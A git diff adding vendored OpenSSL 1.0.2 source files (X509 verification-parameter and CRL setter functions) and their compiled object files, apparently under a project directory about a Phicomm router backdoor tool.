+    x509_verify_param_copy(purpose, 0);
+    x509_verify_param_copy(trust, 0);
+    x509_verify_param_copy(depth, -1);
+
+    /* If overwrite or check time not set, copy across */
+
+    if (to_overwrite || !(dest->flags & X509_V_FLAG_USE_CHECK_TIME)) {
+        dest->check_time = src->check_time;
+        dest->flags &= ~X509_V_FLAG_USE_CHECK_TIME;
+        /* Don't need to copy flag: that is done below */
+    }
+
+    if (inh_flags & X509_VP_FLAG_RESET_FLAGS)
+        dest->flags = 0;
+
+    dest->flags |= src->flags;
+
+    if (test_x509_verify_param_copy(policies, NULL)) {
+        if (!X509_VERIFY_PARAM_set1_policies(dest, src->policies))
+            return 0;
+    }
+
+    /* Copy the host flags if and only if we're copying the host list */
+    if (test_x509_verify_param_copy_id(hosts, NULL)) {
+        if (dest->id->hosts) {
+            string_stack_free(dest->id->hosts);
+            dest->id->hosts = NULL;
+        }
+        if (id->hosts) {
+            dest->id->hosts =
+                sk_OPENSSL_STRING_deep_copy(id->hosts, str_copy, str_free);
+            if (dest->id->hosts == NULL)
+                return 0;
+            dest->id->hostflags = id->hostflags;
+        }
+    }
+
+    if (test_x509_verify_param_copy_id(email, NULL)) {
+        if (!X509_VERIFY_PARAM_set1_email(dest, id->email, id->emaillen))
+            return 0;
+    }
+
+    if (test_x509_verify_param_copy_id(ip, NULL)) {
+        if (!X509_VERIFY_PARAM_set1_ip(dest, id->ip, id->iplen))
+            return 0;
+    }
+
+    return 1;
+}
+
+int X509_VERIFY_PARAM_set1(X509_VERIFY_PARAM *to,
+                           const X509_VERIFY_PARAM *from)
+{
+    unsigned long save_flags = to->inh_flags;
+    int ret;
+    to->inh_flags |= X509_VP_FLAG_DEFAULT;
+    ret = X509_VERIFY_PARAM_inherit(to, from);
+    to->inh_flags = save_flags;
+    return ret;
+}
+
+static int int_x509_param_set1(char **pdest, size_t *pdestlen,
+                               const char *src, size_t srclen)
+{
+    void *tmp;
+    if (src) {
+        if (srclen == 0) {
+            tmp = BUF_strdup(src);
+            srclen = strlen(src);
+        } else
+            tmp = BUF_memdup(src, srclen);
+        if (!tmp)
+            return 0;
+    } else {
+        tmp = NULL;
+        srclen = 0;
+    }
+    if (*pdest)
+        OPENSSL_free(*pdest);
+    *pdest = tmp;
+    if (pdestlen)
+        *pdestlen = srclen;
+    return 1;
+}
+
+int X509_VERIFY_PARAM_set1_name(X509_VERIFY_PARAM *param, const char *name)
+{
+    if (param->name)
+        OPENSSL_free(param->name);
+    param->name = BUF_strdup(name);
+    if (param->name)
+        return 1;
+    return 0;
+}
+
+int X509_VERIFY_PARAM_set_flags(X509_VERIFY_PARAM *param, unsigned long flags)
+{
+    param->flags |= flags;
+    if (flags & X509_V_FLAG_POLICY_MASK)
+        param->flags |= X509_V_FLAG_POLICY_CHECK;
+    return 1;
+}
+
+int X509_VERIFY_PARAM_clear_flags(X509_VERIFY_PARAM *param,
+                                  unsigned long flags)
+{
+    param->flags &= ~flags;
+    return 1;
+}
+
+unsigned long X509_VERIFY_PARAM_get_flags(X509_VERIFY_PARAM *param)
+{
+    return param->flags;
+}
+
+int X509_VERIFY_PARAM_set_purpose(X509_VERIFY_PARAM *param, int purpose)
+{
+    return X509_PURPOSE_set(&param->purpose, purpose);
+}
+
+int X509_VERIFY_PARAM_set_trust(X509_VERIFY_PARAM *param, int trust)
+{
+    return X509_TRUST_set(&param->trust, trust);
+}
+
+void X509_VERIFY_PARAM_set_depth(X509_VERIFY_PARAM *param, int depth)
+{
+    param->depth = depth;
+}
+
+void X509_VERIFY_PARAM_set_time(X509_VERIFY_PARAM *param, time_t t)
+{
+    param->check_time = t;
+    param->flags |= X509_V_FLAG_USE_CHECK_TIME;
+}
+
+int X509_VERIFY_PARAM_add0_policy(X509_VERIFY_PARAM *param,
+                                  ASN1_OBJECT *policy)
+{
+    if (!param->policies) {
+        param->policies = sk_ASN1_OBJECT_new_null();
+        if (!param->policies)
+            return 0;
+    }
+    if (!sk_ASN1_OBJECT_push(param->policies, policy))
+        return 0;
+    return 1;
+}
+
+int X509_VERIFY_PARAM_set1_policies(X509_VERIFY_PARAM *param,
+                                    STACK_OF(ASN1_OBJECT) *policies)
+{
+    int i;
+    ASN1_OBJECT *oid, *doid;
+    if (!param)
+        return 0;
+    if (param->policies)
+        sk_ASN1_OBJECT_pop_free(param->policies, ASN1_OBJECT_free);
+
+    if (!policies) {
+        param->policies = NULL;
+        return 1;
+    }
+
+    param->policies = sk_ASN1_OBJECT_new_null();
+    if (!param->policies)
+        return 0;
+
+    for (i = 0; i < sk_ASN1_OBJECT_num(policies); i++) {
+        oid = sk_ASN1_OBJECT_value(policies, i);
+        doid = OBJ_dup(oid);
+        if (!doid)
+            return 0;
+        if (!sk_ASN1_OBJECT_push(param->policies, doid)) {
+            ASN1_OBJECT_free(doid);
+            return 0;
+        }
+    }
+    param->flags |= X509_V_FLAG_POLICY_CHECK;
+    return 1;
+}
+
+int X509_VERIFY_PARAM_set1_host(X509_VERIFY_PARAM *param,
+                                const char *name, size_t namelen)
+{
+    return int_x509_param_set_hosts(param->id, SET_HOST, name, namelen);
+}
+
+int X509_VERIFY_PARAM_add1_host(X509_VERIFY_PARAM *param,
+                                const char *name, size_t namelen)
+{
+    return int_x509_param_set_hosts(param->id, ADD_HOST, name, namelen);
+}
+
+void X509_VERIFY_PARAM_set_hostflags(X509_VERIFY_PARAM *param,
+                                     unsigned int flags)
+{
+    param->id->hostflags = flags;
+}
+
+char *X509_VERIFY_PARAM_get0_peername(X509_VERIFY_PARAM *param)
+{
+    return param->id->peername;
+}
+
+int X509_VERIFY_PARAM_set1_email(X509_VERIFY_PARAM *param,
+                                 const char *email, size_t emaillen)
+{
+    return int_x509_param_set1(&param->id->email, &param->id->emaillen,
+                               email, emaillen);
+}
+
+int X509_VERIFY_PARAM_set1_ip(X509_VERIFY_PARAM *param,
+                              const unsigned char *ip, size_t iplen)
+{
+    if (iplen != 0 && iplen != 4 && iplen != 16)
+        return 0;
+    return int_x509_param_set1((char **)&param->id->ip, &param->id->iplen,
+                               (char *)ip, iplen);
+}
+
+int X509_VERIFY_PARAM_set1_ip_asc(X509_VERIFY_PARAM *param, const char *ipasc)
+{
+    unsigned char ipout[16];
+    size_t iplen;
+
+    iplen = (size_t)a2i_ipadd(ipout, ipasc);
+    if (iplen == 0)
+        return 0;
+    return X509_VERIFY_PARAM_set1_ip(param, ipout, iplen);
+}
+
+int X509_VERIFY_PARAM_get_depth(const X509_VERIFY_PARAM *param)
+{
+    return param->depth;
+}
+
+const char *X509_VERIFY_PARAM_get0_name(const X509_VERIFY_PARAM *param)
+{
+    return param->name;
+}
+
+static X509_VERIFY_PARAM_ID _empty_id = { NULL, 0U, NULL, NULL, 0, NULL, 0 };
+
+#define vpm_empty_id (X509_VERIFY_PARAM_ID *)&_empty_id
+
+/*
+ * Default verify parameters: these are used for various applications and can
+ * be overridden by the user specified table. NB: the 'name' field *must* be
+ * in alphabetical order because it will be searched using OBJ_search.
+ */
+
+static const X509_VERIFY_PARAM default_table[] = {
+    {
+     "default",                 /* X509 default parameters */
+     0,                         /* Check time */
+     0,                         /* internal flags */
+     0,                         /* flags */
+     0,                         /* purpose */
+     0,                         /* trust */
+     100,                       /* depth */
+     NULL,                      /* policies */
+     vpm_empty_id},
+    {
+     "pkcs7",                   /* S/MIME sign parameters */
+     0,                         /* Check time */
+     0,                         /* internal flags */
+     0,                         /* flags */
+     X509_PURPOSE_SMIME_SIGN,   /* purpose */
+     X509_TRUST_EMAIL,          /* trust */
+     -1,                        /* depth */
+     NULL,                      /* policies */
+     vpm_empty_id},
+    {
+     "smime_sign",              /* S/MIME sign parameters */
+     0,                         /* Check time */
+     0,                         /* internal flags */
+     0,                         /* flags */
+     X509_PURPOSE_SMIME_SIGN,   /* purpose */
+     X509_TRUST_EMAIL,          /* trust */
+     -1,                        /* depth */
+     NULL,                      /* policies */
+     vpm_empty_id},
+    {
+     "ssl_client",              /* SSL/TLS client parameters */
+     0,                         /* Check time */
+     0,                         /* internal flags */
+     0,                         /* flags */
+     X509_PURPOSE_SSL_CLIENT,   /* purpose */
+     X509_TRUST_SSL_CLIENT,     /* trust */
+     -1,                        /* depth */
+     NULL,                      /* policies */
+     vpm_empty_id},
+    {
+     "ssl_server",              /* SSL/TLS server parameters */
+     0,                         /* Check time */
+     0,                         /* internal flags */
+     0,                         /* flags */
+     X509_PURPOSE_SSL_SERVER,   /* purpose */
+     X509_TRUST_SSL_SERVER,     /* trust */
+     -1,                        /* depth */
+     NULL,                      /* policies */
+     vpm_empty_id}
+};
+
+static STACK_OF(X509_VERIFY_PARAM) *param_table = NULL;
+
+static int table_cmp(const X509_VERIFY_PARAM *a, const X509_VERIFY_PARAM *b)
+{
+    return strcmp(a->name, b->name);
+}
+
+DECLARE_OBJ_BSEARCH_CMP_FN(X509_VERIFY_PARAM, X509_VERIFY_PARAM, table);
+IMPLEMENT_OBJ_BSEARCH_CMP_FN(X509_VERIFY_PARAM, X509_VERIFY_PARAM, table);
+
+static int param_cmp(const X509_VERIFY_PARAM *const *a,
+                     const X509_VERIFY_PARAM *const *b)
+{
+    return strcmp((*a)->name, (*b)->name);
+}
+
+int X509_VERIFY_PARAM_add0_table(X509_VERIFY_PARAM *param)
+{
+    int idx;
+    X509_VERIFY_PARAM *ptmp;
+    if (!param_table) {
+        param_table = sk_X509_VERIFY_PARAM_new(param_cmp);
+        if (!param_table)
+            return 0;
+    } else {
+        idx = sk_X509_VERIFY_PARAM_find(param_table, param);
+        if (idx != -1) {
+            ptmp = sk_X509_VERIFY_PARAM_value(param_table, idx);
+            X509_VERIFY_PARAM_free(ptmp);
+            (void)sk_X509_VERIFY_PARAM_delete(param_table, idx);
+        }
+    }
+    if (!sk_X509_VERIFY_PARAM_push(param_table, param))
+        return 0;
+    return 1;
+}
+
+int X509_VERIFY_PARAM_get_count(void)
+{
+    int num = sizeof(default_table) / sizeof(X509_VERIFY_PARAM);
+    if (param_table)
+        num += sk_X509_VERIFY_PARAM_num(param_table);
+    return num;
+}
+
+const X509_VERIFY_PARAM *X509_VERIFY_PARAM_get0(int id)
+{
+    int num = sizeof(default_table) / sizeof(X509_VERIFY_PARAM);
+    if (id < num)
+        return default_table + id;
+    return sk_X509_VERIFY_PARAM_value(param_table, id - num);
+}
+
+const X509_VERIFY_PARAM *X509_VERIFY_PARAM_lookup(const char *name)
+{
+    int idx;
+    X509_VERIFY_PARAM pm;
+
+    pm.name = (char *)name;
+    if (param_table) {
+        idx = sk_X509_VERIFY_PARAM_find(param_table, &pm);
+        if (idx != -1)
+            return sk_X509_VERIFY_PARAM_value(param_table, idx);
+    }
+    return OBJ_bsearch_table(&pm, default_table,
+                             sizeof(default_table) /
+                             sizeof(X509_VERIFY_PARAM));
+}
+
+void X509_VERIFY_PARAM_table_cleanup(void)
+{
+    if (param_table)
+        sk_X509_VERIFY_PARAM_pop_free(param_table, X509_VERIFY_PARAM_free);
+    param_table = NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vpm.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vpm.o
new file mode 100644
index 0000000000000000000000000000000000000000..60186c57a05259ca678dab86ba3b3d3f130873f8
GIT binary patch
literal 11352
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
U`0ojB`sF{hCB7{L>FLz}U!syp%K!iX

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509cset.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509cset.c
new file mode 100644
index 0000000..24ca35b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509cset.c
@@ -0,0 +1,167 @@
+/* crypto/x509/x509cset.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+
+int X509_CRL_set_version(X509_CRL *x, long version)
+{
+    if (x == NULL)
+        return (0);
+    if (x->crl->version == NULL) {
+        if ((x->crl->version = M_ASN1_INTEGER_new()) == NULL)
+            return (0);
+    }
+    return (ASN1_INTEGER_set(x->crl->version, version));
+}
+
+int X509_CRL_set_issuer_name(X509_CRL *x, X509_NAME *name)
+{
+    if ((x == NULL) || (x->crl == NULL))
+        return (0);
+    return (X509_NAME_set(&x->crl->issuer, name));
+}
+
+int X509_CRL_set_lastUpdate(X509_CRL *x, const ASN1_TIME *tm)
+{
+    ASN1_TIME *in;
+
+    if (x == NULL)
+        return (0);
+    in = x->crl->lastUpdate;
+    if (in != tm) {
+        in = M_ASN1_TIME_dup(tm);
+        if (in != NULL) {
+            M_ASN1_TIME_free(x->crl->lastUpdate);
+            x->crl->lastUpdate = in;
+        }
+    }
+    return (in != NULL);
+}
+
+int X509_CRL_set_nextUpdate(X509_CRL *x, const ASN1_TIME *tm)
+{
+    ASN1_TIME *in;
+
+    if (x == NULL)
+        return (0);
+    in = x->crl->nextUpdate;
+    if (in != tm) {
+        in = M_ASN1_TIME_dup(tm);
+        if (in != NULL) {
+            M_ASN1_TIME_free(x->crl->nextUpdate);
+            x->crl->nextUpdate = in;
+        }
+    }
+    return (in != NULL);
+}
+
+int X509_CRL_sort(X509_CRL *c)
+{
+    int i;
+    X509_REVOKED *r;
+    /*
+     * sort the data so it will be written in serial number order
+     */
+    sk_X509_REVOKED_sort(c->crl->revoked);
+    for (i = 0; i < sk_X509_REVOKED_num(c->crl->revoked); i++) {
+        r = sk_X509_REVOKED_value(c->crl->revoked, i);
+        r->sequence = i;
+    }
+    c->crl->enc.modified = 1;
+    return 1;
+}
+
+int X509_REVOKED_set_revocationDate(X509_REVOKED *x, ASN1_TIME *tm)
+{
+    ASN1_TIME *in;
+
+    if (x == NULL)
+        return (0);
+    in = x->revocationDate;
+    if (in != tm) {
+        in = M_ASN1_TIME_dup(tm);
+        if (in != NULL) {
+            M_ASN1_TIME_free(x->revocationDate);
+            x->revocationDate = in;
+        }
+    }
+    return (in != NULL);
+}
+
+int X509_REVOKED_set_serialNumber(X509_REVOKED *x, ASN1_INTEGER *serial)
+{
+    ASN1_INTEGER *in;
+
+    if (x == NULL)
+        return (0);
+    in = x->serialNumber;
+    if (in != serial) {
+        in = M_ASN1_INTEGER_dup(serial);
+        if (in != NULL) {
+            M_ASN1_INTEGER_free(x->serialNumber);
+            x->serialNumber = in;
+        }
+    }
+    return (in != NULL);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509cset.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509cset.o
new file mode 100644
index 0000000000000000000000000000000000000000..35618a3607528579edb9f018f4c68035f3b1e489
GIT binary patch
literal 3312
zcmb_fO>7%Q6duQcxJ|lsOF@=GkpT;W+OBM9mAWACCU!h&9j7EV3JuX}?QU=s|7mxf
zIv|BZ2-0E>9H`U-7j7VN=#c{mOK#~U7Y>}bl}k}uBtU>fk-~esGs$>kOBLct<M-y9
z_rCXb-pp?DUMe#+;PVkKKJqHrn{kwo>j(DigkvViAu>XKKm63+bZf_&QF8Oten2<x
zg)*(@r#D}T5bG#y`DyDc-MkT6RNnd-qrM%0A8K2Xz#W{@7FcwvJ#7z08sDR1tPQT6
zSi8fCkI>d@nBV~2ycKjfgheG!?LRQ@>$EjQ<MojBEVch~sqLFUY(3`G&<wG3erlH>
z2i>}VY4PyY_L7*%OBU`&78c0DJ;?I0`@1!@nq#}(+>YOYqBdZ6nq&4a&Z=FC?A*Nj
z<E;e6z5fb-E-fzY?!no;$BbVISjRojc!;*%W&3Hb26_~P`*%j*7`H|}6vMRjvRkKp
z!b3pPlauGdWBEd(YBj=f`6W4eDmLD5rm>9|qjL203oeWu9fT2t@d%7`Hcz16ZN&UA
zP>#8Z_}-Z#zGl!jIx-aa7@qeu;7_u(H&I`Zf*%biQfSkkmZG_XQb_4Y!HI1tkQ&yc
z&?MMWK<R8_t{jUy&h!}Q60>JepO=Ck3?z{&DTNK7l7dN${*Dmz{p2BiBjDE-eN)Ig
z$#^#$UPTHxoX%!~Zxa2x@~?E|KMBjn*o9N}`7U?);&MMhib3-0POo);&l`<B;a%yD
